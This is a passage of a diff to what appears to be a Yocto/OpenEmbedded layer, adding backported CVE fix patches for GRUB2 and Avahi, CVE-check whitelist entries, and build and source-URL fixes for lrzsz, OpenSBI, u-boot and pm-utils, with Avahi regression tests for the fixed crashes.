+++ b/meta/recipes-bsp/grub/grub2.inc
@@ -13,6 +13,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
13 13
14CVE_PRODUCT = "grub2" 14CVE_PRODUCT = "grub2"
15 15
16# Applies only to RHEL
17CVE_CHECK_WHITELIST += "CVE-2019-14865"
18# Applies only to SUSE
19CVE_CHECK_WHITELIST += "CVE-2021-46705"
20
16SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \ 21SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \
17 file://0001-Disable-mfpmath-sse-as-well-when-SSE-is-disabled.patch \ 22 file://0001-Disable-mfpmath-sse-as-well-when-SSE-is-disabled.patch \
18 file://autogen.sh-exclude-pc.patch \ 23 file://autogen.sh-exclude-pc.patch \
@@ -28,7 +33,85 @@ SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \
28 file://CVE-2020-15706-script-Avoid-a-use-after-free-when-redefining-a-func.patch \ 33 file://CVE-2020-15706-script-Avoid-a-use-after-free-when-redefining-a-func.patch \
29 file://CVE-2020-15707-linux-Fix-integer-overflows-in-initrd-size-handling.patch \ 34 file://CVE-2020-15707-linux-Fix-integer-overflows-in-initrd-size-handling.patch \
30 file://determinism.patch \ 35 file://determinism.patch \
31" 36 file://no-insmod-on-sb.patch \
37 file://CVE-2020-14372_1.patch \
38 file://CVE-2020-14372_2.patch \
39 file://CVE-2020-14372_3.patch \
40 file://CVE-2020-14372_4.patch \
41 file://CVE-2020-14372_5.patch \
42 file://CVE-2020-14372.patch \
43 file://CVE-2020-27779.patch \
44 file://CVE-2020-27779_2.patch \
45 file://CVE-2020-27779_3.patch \
46 file://CVE-2020-27779_4.patch \
47 file://CVE-2020-27779_5.patch \
48 file://CVE-2020-27779_6.patch \
49 file://CVE-2020-27779_7.patch \
50 file://CVE-2020-25632.patch \
51 file://CVE-2020-25647.patch \
52 file://0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch \
53 file://0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch \
54 file://0003-net-tftp-Fix-dangling-memory-pointer.patch \
55 file://0004-kern-parser-Fix-resource-leak-if-argc-0.patch \
56 file://0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch \
57 file://0006-kern-efi-Fix-memory-leak-on-failure.patch \
58 file://0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch \
59 file://0008-gnulib-regexec-Resolve-unused-variable.patch \
60 file://0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch \
61 file://0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch \
62 file://0011-gnulib-regexec-Fix-possible-null-dereference.patch \
63 file://0012-gnulib-regcomp-Fix-uninitialized-re_token.patch \
64 file://0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch \
65 file://0014-zstd-Initialize-seq_t-structure-fully.patch \
66 file://0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch \
67 file://0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch \
68 file://0017-disk-ldm-If-failed-then-free-vg-variable-too.patch \
69 file://0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch \
70 file://0019-disk-cryptodisk-Fix-potential-integer-overflow.patch \
71 file://0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch \
72 file://0021-zfs-Fix-possible-negative-shift-operation.patch \
73 file://0022-zfs-Fix-resource-leaks-while-constructing-path.patch \
74 file://0023-zfs-Fix-possible-integer-overflows.patch \
75 file://0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch \
76 file://0025-affs-Fix-memory-leaks.patch \
77 file://0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch \
78 file://0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch \
79 file://0028-syslinux-Fix-memory-leak-while-parsing.patch \
80 file://0029-normal-completion-Fix-leaking-of-memory-when-process.patch \
81 file://0030-commands-hashsum-Fix-a-memory-leak.patch \
82 file://0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch \
83 file://0032-video-fb-fbfill-Fix-potential-integer-overflow.patch \
84 file://0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch \
85 file://0034-video-fb-video_fb-Fix-possible-integer-overflow.patch \
86 file://0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch \
87 file://0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch \
88 file://0037-loader-bsd-Check-for-NULL-arg-up-front.patch \
89 file://0038-loader-xnu-Fix-memory-leak.patch \
90 file://0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch \
91 file://0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch \
92 file://0041-util-grub-install-Fix-NULL-pointer-dereferences.patch \
93 file://0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch \
94 file://0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch \
95 file://0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch \
96 file://0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch \
97 file://0046-script-execute-Avoid-crash-when-using-outside-a-func.patch \
98 file://CVE-2021-3981.patch \
99 file://CVE-2021-3695.patch \
100 file://CVE-2021-3696.patch \
101 file://CVE-2021-3697.patch \
102 file://CVE-2022-28733.patch \
103 file://CVE-2022-28734.patch \
104 file://CVE-2022-28736.patch \
105 file://CVE-2022-28735.patch \
106 file://font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch \
107 file://CVE-2022-2601.patch \
108 file://CVE-2022-3775.patch \
109 file://CVE-2020-27749.patch \
110 file://CVE-2021-20225.patch \
111 file://CVE-2021-20233.patch \
112 file://CVE-2023-4692.patch \
113 file://CVE-2023-4693.patch \
114 "
32SRC_URI[md5sum] = "5ce674ca6b2612d8939b9e6abed32934" 115SRC_URI[md5sum] = "5ce674ca6b2612d8939b9e6abed32934"
33SRC_URI[sha256sum] = "f10c85ae3e204dbaec39ae22fa3c5e99f0665417e91c2cb49b7e5031658ba6ea" 116SRC_URI[sha256sum] = "f10c85ae3e204dbaec39ae22fa3c5e99f0665417e91c2cb49b7e5031658ba6ea"
34 117
@@ -47,6 +130,8 @@ GRUBPLATFORM ??= "pc"
47 130
48inherit autotools gettext texinfo pkgconfig 131inherit autotools gettext texinfo pkgconfig
49 132
133CFLAGS_remove = "-O2"
134
50EXTRA_OECONF = "--with-platform=${GRUBPLATFORM} \ 135EXTRA_OECONF = "--with-platform=${GRUBPLATFORM} \
51 --disable-grub-mkfont \ 136 --disable-grub-mkfont \
52 --program-prefix="" \ 137 --program-prefix="" \
diff --git a/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch b/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch
new file mode 100644
index 0000000000..47c7ec4170
--- /dev/null
+++ b/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch
@@ -0,0 +1,36 @@
1From ecdcf0df6c28c65ca6d1e5638726e13e373c76c5 Mon Sep 17 00:00:00 2001
2From: Khem Raj <raj.khem@gmail.com>
3Date: Wed, 11 Nov 2020 22:58:55 -0800
4Subject: [PATCH] Fix cross compilation using autoconf detected AR
5
6currently its using 'ar' program from build host, which is not expected,
7we need to respect AR passed in environment
8
9Upstream-Status: Pending
10
11Signed-off-by: Khem Raj <raj.khem@gmail.com>
12---
13 configure.in | 7 +++++++
14 1 file changed, 7 insertions(+)
15
16diff --git a/configure.in b/configure.in
17index 4ddbe8b..b7c3c31 100644
18--- a/configure.in
19+++ b/configure.in
20@@ -84,6 +84,13 @@ AC_ARG_ENABLE(syslog,
21 ])
22
23 dnl Checks for programs.
24+m4_ifndef([AC_PROG_AR],[dnl
25+ AN_MAKEVAR([AR], [AC_PROG_AR])
26+ AN_PROGRAM([ar], [AC_PROG_AR])
27+ AC_DEFUN([AC_PROG_AR],
28+ [AC_CHECK_TOOL(AR, ar, :)])
29+])
30+AC_PROG_AR
31 AC_PROG_CC
32 AC_PROG_GCC_TRADITIONAL
33 dnl AC_PROG_INSTALL included in AM_INIT_AUTOMAKE
34--
352.29.2
36
diff --git a/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb b/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
index 4129237c59..54c431eeb3 100644
--- a/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
+++ b/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
@@ -19,6 +19,7 @@ SRC_URI = "http://www.ohse.de/uwe/releases/lrzsz-${PV}.tar.gz \
19 file://lrzsz-check-locale.h.patch \ 19 file://lrzsz-check-locale.h.patch \
20 file://cve-2018-10195.patch \ 20 file://cve-2018-10195.patch \
21 file://include.patch \ 21 file://include.patch \
22 file://0001-Fix-cross-compilation-using-autoconf-detected-AR.patch \
22 " 23 "
23 24
24SRC_URI[md5sum] = "b5ce6a74abc9b9eb2af94dffdfd372a4" 25SRC_URI[md5sum] = "b5ce6a74abc9b9eb2af94dffdfd372a4"
diff --git a/meta/recipes-bsp/opensbi/opensbi_0.6.bb b/meta/recipes-bsp/opensbi/opensbi_0.6.bb
index 56f2d4b915..972d8de17d 100644
--- a/meta/recipes-bsp/opensbi/opensbi_0.6.bb
+++ b/meta/recipes-bsp/opensbi/opensbi_0.6.bb
@@ -1,5 +1,6 @@
1SUMMARY = "RISC-V Open Source Supervisor Binary Interface (OpenSBI)" 1SUMMARY = "RISC-V Open Source Supervisor Binary Interface (OpenSBI)"
2DESCRIPTION = "OpenSBI aims to provide an open-source and extensible implementation of the RISC-V SBI specification for a platform specific firmware (M-mode) and a general purpose OS, hypervisor or bootloader (S-mode or HS-mode). OpenSBI implementation can be easily extended by RISC-V platform or System-on-Chip vendors to fit a particular hadware configuration." 2DESCRIPTION = "OpenSBI aims to provide an open-source and extensible implementation of the RISC-V SBI specification for a platform specific firmware (M-mode) and a general purpose OS, hypervisor or bootloader (S-mode or HS-mode). OpenSBI implementation can be easily extended by RISC-V platform or System-on-Chip vendors to fit a particular hadware configuration."
3HOMEPAGE = "https://github.com/riscv/opensbi"
3LICENSE = "BSD-2-Clause" 4LICENSE = "BSD-2-Clause"
4LIC_FILES_CHKSUM = "file://COPYING.BSD;md5=42dd9555eb177f35150cf9aa240b61e5" 5LIC_FILES_CHKSUM = "file://COPYING.BSD;md5=42dd9555eb177f35150cf9aa240b61e5"
5 6
@@ -8,7 +9,7 @@ require opensbi-payloads.inc
8inherit autotools-brokensep deploy 9inherit autotools-brokensep deploy
9 10
10SRCREV = "ac5e821d50be631f26274765a59bc1b444ffd862" 11SRCREV = "ac5e821d50be631f26274765a59bc1b444ffd862"
11SRC_URI = "git://github.com/riscv/opensbi.git \ 12SRC_URI = "git://github.com/riscv/opensbi.git;branch=master;protocol=https \
12 file://0001-Makefile-Don-t-specify-mabi-or-march.patch \ 13 file://0001-Makefile-Don-t-specify-mabi-or-march.patch \
13 " 14 "
14 15
diff --git a/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb b/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
index cac09101c4..fa3b993788 100644
--- a/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
+++ b/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
@@ -19,9 +19,12 @@ PACKAGECONFIG[manpages] = "--enable-doc, --disable-doc, libxslt-native xmlto-nat
19 19
20RDEPENDS_${PN} = "grep bash" 20RDEPENDS_${PN} = "grep bash"
21 21
22EXTRA_OECONF = "--libdir=${nonarch_libdir}"
23
22do_configure_prepend () { 24do_configure_prepend () {
23 ( cd ${S}; autoreconf -f -i -s ) 25 ( cd ${S}; autoreconf -f -i -s )
24} 26}
25 27
26FILES_${PN} += "${libdir}/${BPN}/*" 28FILES_${PN} += "${nonarch_libdir}/${BPN}/*"
27FILES_${PN}-dbg += "${datadir}/doc/pm-utils/README.debugging" 29FILES_${PN}-dbg += "${datadir}/doc/pm-utils/README.debugging"
30FILES_${PN}-dev += "${nonarch_libdir}/pkgconfig/pm-utils.pc"
diff --git a/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb b/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
index 613e3161fb..8234b86162 100644
--- a/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
+++ b/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
@@ -10,7 +10,7 @@ LICENSE = "LGPL-2.1"
10LIC_FILES_CHKSUM = "file://Licenses/lgpl-2.1.txt;md5=4fbd65380cdd255951079008b364516c" 10LIC_FILES_CHKSUM = "file://Licenses/lgpl-2.1.txt;md5=4fbd65380cdd255951079008b364516c"
11SECTION = "libs" 11SECTION = "libs"
12 12
13SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https" 13SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https;branch=master"
14SRCREV = "824551ac77bab1d0f7ae34d7a7c77b155240e754" 14SRCREV = "824551ac77bab1d0f7ae34d7a7c77b155240e754"
15 15
16S = "${WORKDIR}/git" 16S = "${WORKDIR}/git"
diff --git a/meta/recipes-bsp/u-boot/u-boot-common.inc b/meta/recipes-bsp/u-boot/u-boot-common.inc
index 198ed52c7c..91fe08966b 100644
--- a/meta/recipes-bsp/u-boot/u-boot-common.inc
+++ b/meta/recipes-bsp/u-boot/u-boot-common.inc
@@ -14,13 +14,13 @@ PE = "1"
14# repo during parse 14# repo during parse
15SRCREV = "303f8fed261020c1cb7da32dad63b610bf6873dd" 15SRCREV = "303f8fed261020c1cb7da32dad63b610bf6873dd"
16 16
17SRC_URI = "git://git.denx.de/u-boot.git \ 17SRC_URI = "git://source.denx.de/u-boot/u-boot.git;protocol=https;branch=master \
18 file://remove-redundant-yyloc-global.patch \ 18 file://remove-redundant-yyloc-global.patch \
19 file://CVE-2020-8432.patch \ 19 file://CVE-2020-8432.patch \
20 file://CVE-2020-10648-1.patch \ 20 file://CVE-2020-10648-1.patch \
21 file://CVE-2020-10648-2.patch \ 21 file://CVE-2020-10648-2.patch \
22 " 22 "
23 23
24S = "${WORKDIR}/git" 24S = "${WORKDIR}/git"
25B = "${WORKDIR}/build" 25B = "${WORKDIR}/build"
26do_configure[cleandirs] = "${B}" 26do_configure[cleandirs] = "${B}"
diff --git a/meta/recipes-bsp/v86d/v86d_0.1.10.bb b/meta/recipes-bsp/v86d/v86d_0.1.10.bb
index a8df80fdd6..e614de0c48 100644
--- a/meta/recipes-bsp/v86d/v86d_0.1.10.bb
+++ b/meta/recipes-bsp/v86d/v86d_0.1.10.bb
@@ -1,5 +1,6 @@
1SUMMARY = "User support binary for the uvesafb kernel module" 1SUMMARY = "User support binary for the uvesafb kernel module"
2HOMEPAGE = "https://tracker.debian.org/pkg/v86d" 2HOMEPAGE = "https://tracker.debian.org/pkg/v86d"
3DESCRIPTION = "v86d provides a backend for kernel drivers that need to execute x86 BIOS code. The code is executed in a controlled environment and the results are passed back to the kernel via the netlink interface."
3 4
4# the copyright info is at the bottom of README, expect break 5# the copyright info is at the bottom of README, expect break
5LICENSE = "GPLv2" 6LICENSE = "GPLv2"
diff --git a/meta/recipes-connectivity/avahi/avahi.inc b/meta/recipes-connectivity/avahi/avahi.inc
index 6acedb5412..e1dfc7a861 100644
--- a/meta/recipes-connectivity/avahi/avahi.inc
+++ b/meta/recipes-connectivity/avahi/avahi.inc
@@ -21,6 +21,16 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2d5025d4aa3495befef8f17206a5b0a1 \
21 21
22SRC_URI = "https://github.com/lathiat/avahi/releases/download/v${PV}/avahi-${PV}.tar.gz \ 22SRC_URI = "https://github.com/lathiat/avahi/releases/download/v${PV}/avahi-${PV}.tar.gz \
23 file://fix-CVE-2017-6519.patch \ 23 file://fix-CVE-2017-6519.patch \
24 file://CVE-2021-3468.patch \
25 file://CVE-2023-1981.patch \
26 file://CVE-2023-38469-1.patch \
27 file://CVE-2023-38469-2.patch \
28 file://CVE-2023-38470-1.patch \
29 file://CVE-2023-38470-2.patch \
30 file://CVE-2023-38471-1.patch \
31 file://CVE-2023-38471-2.patch \
32 file://CVE-2023-38472.patch \
33 file://CVE-2023-38473.patch \
24 " 34 "
25 35
26UPSTREAM_CHECK_URI = "https://github.com/lathiat/avahi/releases/" 36UPSTREAM_CHECK_URI = "https://github.com/lathiat/avahi/releases/"
diff --git a/meta/recipes-connectivity/avahi/avahi_0.7.bb b/meta/recipes-connectivity/avahi/avahi_0.7.bb
index f6e3afb24e..0df44bffbe 100644
--- a/meta/recipes-connectivity/avahi/avahi_0.7.bb
+++ b/meta/recipes-connectivity/avahi/avahi_0.7.bb
@@ -8,6 +8,9 @@ SRC_URI += "file://00avahi-autoipd \
8 8
9inherit update-rc.d systemd useradd 9inherit update-rc.d systemd useradd
10 10
11# Issue only affects Debian/SUSE, not us
12CVE_CHECK_WHITELIST += "CVE-2021-26720"
13
11PACKAGES =+ "libavahi-gobject avahi-daemon libavahi-common libavahi-core libavahi-client avahi-dnsconfd libavahi-glib avahi-autoipd avahi-utils" 14PACKAGES =+ "libavahi-gobject avahi-daemon libavahi-common libavahi-core libavahi-client avahi-dnsconfd libavahi-glib avahi-autoipd avahi-utils"
12 15
13LICENSE_libavahi-gobject = "LGPLv2.1+" 16LICENSE_libavahi-gobject = "LGPLv2.1+"
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch b/meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch
new file mode 100644
index 0000000000..638a1f6071
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch
@@ -0,0 +1,42 @@
1From 447affe29991ee99c6b9732fc5f2c1048a611d3b Mon Sep 17 00:00:00 2001
2From: Riccardo Schirone <sirmy15@gmail.com>
3Date: Fri, 26 Mar 2021 11:50:24 +0100
4Subject: [PATCH] Avoid infinite-loop in avahi-daemon by handling HUP event in
5 client_work
6
7If a client fills the input buffer, client_work() disables the
8AVAHI_WATCH_IN event, thus preventing the function from executing the
9`read` syscall the next times it is called. However, if the client then
10terminates the connection, the socket file descriptor receives a HUP
11event, which is not handled, thus the kernel keeps marking the HUP event
12as occurring. While iterating over the file descriptors that triggered
13an event, the client file descriptor will keep having the HUP event and
14the client_work() function is always called with AVAHI_WATCH_HUP but
15without nothing being done, thus entering an infinite loop.
16
17See https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=984938
18
19Upstream-Status: Backport
20CVE: CVE-2021-3468
21Signed-off-by: Steve Sakoman <steve@sakoman.com>
22
23---
24 avahi-daemon/simple-protocol.c | 5 +++++
25 1 file changed, 5 insertions(+)
26
27diff --git a/avahi-daemon/simple-protocol.c b/avahi-daemon/simple-protocol.c
28index 3e0ebb11..6c0274d6 100644
29--- a/avahi-daemon/simple-protocol.c
30+++ b/avahi-daemon/simple-protocol.c
31@@ -424,6 +424,11 @@ static void client_work(AvahiWatch *watch, AVAHI_GCC_UNUSED int fd, AvahiWatchEv
32 }
33 }
34
35+ if (events & AVAHI_WATCH_HUP) {
36+ client_free(c);
37+ return;
38+ }
39+
40 c->server->poll_api->watch_update(
41 watch,
42 (c->outbuf_length > 0 ? AVAHI_WATCH_OUT : 0) |
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch
new file mode 100644
index 0000000000..1209864402
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch
@@ -0,0 +1,60 @@
1Backport of:
2
3From a2696da2f2c50ac43b6c4903f72290d5c3fa9f6f Mon Sep 17 00:00:00 2001
4From: =?UTF-8?q?Petr=20Men=C5=A1=C3=ADk?= <pemensik@redhat.com>
5Date: Thu, 17 Nov 2022 01:51:53 +0100
6Subject: [PATCH] Emit error if requested service is not found
7
8It currently just crashes instead of replying with error. Check return
9value and emit error instead of passing NULL pointer to reply.
10
11Fixes #375
12
13Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-1981.patch?h=ubuntu/focal-security
14Upstream commit https://github.com/lathiat/avahi/commit/a2696da2f2c50ac43b6c4903f72290d5c3fa9f6f]
15CVE: CVE-2023-1981
16Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
17---
18 avahi-daemon/dbus-protocol.c | 20 ++++++++++++++------
19 1 file changed, 14 insertions(+), 6 deletions(-)
20
21--- a/avahi-daemon/dbus-protocol.c
22+++ b/avahi-daemon/dbus-protocol.c
23@@ -391,10 +391,14 @@ static DBusHandlerResult msg_server_impl
24 }
25
26 t = avahi_alternative_host_name(n);
27- avahi_dbus_respond_string(c, m, t);
28- avahi_free(t);
29-
30- return DBUS_HANDLER_RESULT_HANDLED;
31+ if (t) {
32+ avahi_dbus_respond_string(c, m, t);
33+ avahi_free(t);
34+
35+ return DBUS_HANDLER_RESULT_HANDLED;
36+ } else {
37+ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NOT_FOUND, "Hostname not found");
38+ }
39
40 } else if (dbus_message_is_method_call(m, AVAHI_DBUS_INTERFACE_SERVER, "GetAlternativeServiceName")) {
41 char *n, *t;
42@@ -405,10 +409,14 @@ static DBusHandlerResult msg_server_impl
43 }
44
45 t = avahi_alternative_service_name(n);
46- avahi_dbus_respond_string(c, m, t);
47- avahi_free(t);
48-
49- return DBUS_HANDLER_RESULT_HANDLED;
50+ if (t) {
51+ avahi_dbus_respond_string(c, m, t);
52+ avahi_free(t);
53+
54+ return DBUS_HANDLER_RESULT_HANDLED;
55+ } else {
56+ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NOT_FOUND, "Service not found");
57+ }
58
59 } else if (dbus_message_is_method_call(m, AVAHI_DBUS_INTERFACE_SERVER, "EntryGroupNew")) {
60 Client *client;
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch
new file mode 100644
index 0000000000..12dad9ef6f
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch
@@ -0,0 +1,48 @@
1From a337a1ba7d15853fb56deef1f464529af6e3a1cf Mon Sep 17 00:00:00 2001
2From: Evgeny Vereshchagin <evvers@ya.ru>
3Date: Mon, 23 Oct 2023 20:29:31 +0000
4Subject: [PATCH] core: reject overly long TXT resource records
5
6Closes https://github.com/lathiat/avahi/issues/455
7
8CVE-2023-38469
9
10Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38469-1.patch?h=ubuntu/focal-security
11Upstream commit https://github.com/lathiat/avahi/commit/a337a1ba7d15853fb56deef1f464529af6e3a1cf]
12CVE: CVE-2023-38469
13Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
14---
15 avahi-core/rr.c | 9 ++++++++-
16 1 file changed, 8 insertions(+), 1 deletion(-)
17
18Index: avahi-0.7/avahi-core/rr.c
19===================================================================
20--- avahi-0.7.orig/avahi-core/rr.c
21+++ avahi-0.7/avahi-core/rr.c
22@@ -32,6 +32,7 @@
23 #include <avahi-common/malloc.h>
24 #include <avahi-common/defs.h>
25
26+#include "dns.h"
27 #include "rr.h"
28 #include "log.h"
29 #include "util.h"
30@@ -688,11 +689,17 @@ int avahi_record_is_valid(AvahiRecord *r
31 case AVAHI_DNS_TYPE_TXT: {
32
33 AvahiStringList *strlst;
34+ size_t used = 0;
35
36- for (strlst = r->data.txt.string_list; strlst; strlst = strlst->next)
37+ for (strlst = r->data.txt.string_list; strlst; strlst = strlst->next) {
38 if (strlst->size > 255 || strlst->size <= 0)
39 return 0;
40
41+ used += 1+strlst->size;
42+ if (used > AVAHI_DNS_RDATA_MAX)
43+ return 0;
44+ }
45+
46 return 1;
47 }
48 }
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch
new file mode 100644
index 0000000000..a62c718ebe
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch
@@ -0,0 +1,65 @@
1From c6cab87df290448a63323c8ca759baa516166237 Mon Sep 17 00:00:00 2001
2From: Evgeny Vereshchagin <evvers@ya.ru>
3Date: Wed, 25 Oct 2023 18:15:42 +0000
4Subject: [PATCH] tests: pass overly long TXT resource records
5
6to make sure they don't crash avahi any more.
7It reproduces https://github.com/lathiat/avahi/issues/455
8
9Canonical notes:
10nickgalanis> removed first hunk since there is no .github dir in this release
11
12Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38469-2.patch?h=ubuntu/focal-security
13Upstream commit https://github.com/lathiat/avahi/commit/c6cab87df290448a63323c8ca759baa516166237]
14CVE: CVE-2023-38469
15Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
16---
17 avahi-client/client-test.c | 14 ++++++++++++++
18 1 files changed, 14 insertions(+)
19
20Index: avahi-0.7/avahi-client/client-test.c
21===================================================================
22--- avahi-0.7.orig/avahi-client/client-test.c
23+++ avahi-0.7/avahi-client/client-test.c
24@@ -22,6 +22,7 @@
25 #endif
26
27 #include <stdio.h>
28+#include <string.h>
29 #include <assert.h>
30
31 #include <avahi-client/client.h>
32@@ -33,6 +34,8 @@
33 #include <avahi-common/malloc.h>
34 #include <avahi-common/timeval.h>
35
36+#include <avahi-core/dns.h>
37+
38 static const AvahiPoll *poll_api = NULL;
39 static AvahiSimplePoll *simple_poll = NULL;
40
41@@ -222,6 +225,9 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
42 uint32_t cookie;
43 struct timeval tv;
44 AvahiAddress a;
45+ uint8_t rdata[AVAHI_DNS_RDATA_MAX+1];
46+ AvahiStringList *txt = NULL;
47+ int r;
48
49 simple_poll = avahi_simple_poll_new();
50 poll_api = avahi_simple_poll_get(simple_poll);
51@@ -258,6 +264,14 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
52 printf("%s\n", avahi_strerror(avahi_entry_group_add_service (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Lathiat's Site", "_http._tcp", NULL, NULL, 80, "foo=bar", NULL)));
53 printf("add_record: %d\n", avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "\5booya", 6));
54
55+ memset(rdata, 1, sizeof(rdata));
56+ r = avahi_string_list_parse(rdata, sizeof(rdata), &txt);
57+ assert(r >= 0);
58+ assert(avahi_string_list_serialize(txt, NULL, 0) == sizeof(rdata));
59+ error = avahi_entry_group_add_service_strlst(group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", "_qotd._tcp", NULL, NULL, 123, txt);
60+ assert(error == AVAHI_ERR_INVALID_RECORD);
61+ avahi_string_list_free(txt);
62+
63 avahi_entry_group_commit (group);
64
65 domain = avahi_domain_browser_new (avahi, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, NULL, AVAHI_DOMAIN_BROWSER_BROWSE, 0, avahi_domain_browser_callback, (char*) "omghai3u");
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch
new file mode 100644
index 0000000000..82fb1ab40b
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch
@@ -0,0 +1,57 @@
1From 94cb6489114636940ac683515417990b55b5d66c Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Petr=20Men=C5=A1=C3=ADk?= <pemensik@redhat.com>
3Date: Tue, 11 Apr 2023 15:29:59 +0200
4Subject: [PATCH] Ensure each label is at least one byte long
5
6The only allowed exception is single dot, where it should return empty
7string.
8
9Fixes #454.
10
11Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38470-1.patch?h=ubuntu/focal-security
12Upstream commit https://github.com/lathiat/avahi/commit/94cb6489114636940ac683515417990b55b5d66c]
13CVE: CVE-2023-38470
14Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
15---
16 avahi-common/domain-test.c | 14 ++++++++++++++
17 avahi-common/domain.c | 2 +-
18 2 files changed, 15 insertions(+), 1 deletion(-)
19
20Index: avahi-0.7/avahi-common/domain-test.c
21===================================================================
22--- avahi-0.7.orig/avahi-common/domain-test.c
23+++ avahi-0.7/avahi-common/domain-test.c
24@@ -45,6 +45,20 @@ int main(AVAHI_GCC_UNUSED int argc, AVAH
25 printf("%s\n", s = avahi_normalize_name_strdup("fo\\\\o\\..f oo."));
26 avahi_free(s);
27
28+ printf("%s\n", s = avahi_normalize_name_strdup("."));
29+ avahi_free(s);
30+
31+ s = avahi_normalize_name_strdup(",.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}."
32+ "}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}"
33+ ".?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`"
34+ "?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?."
35+ "?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}."
36+ "??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}?"
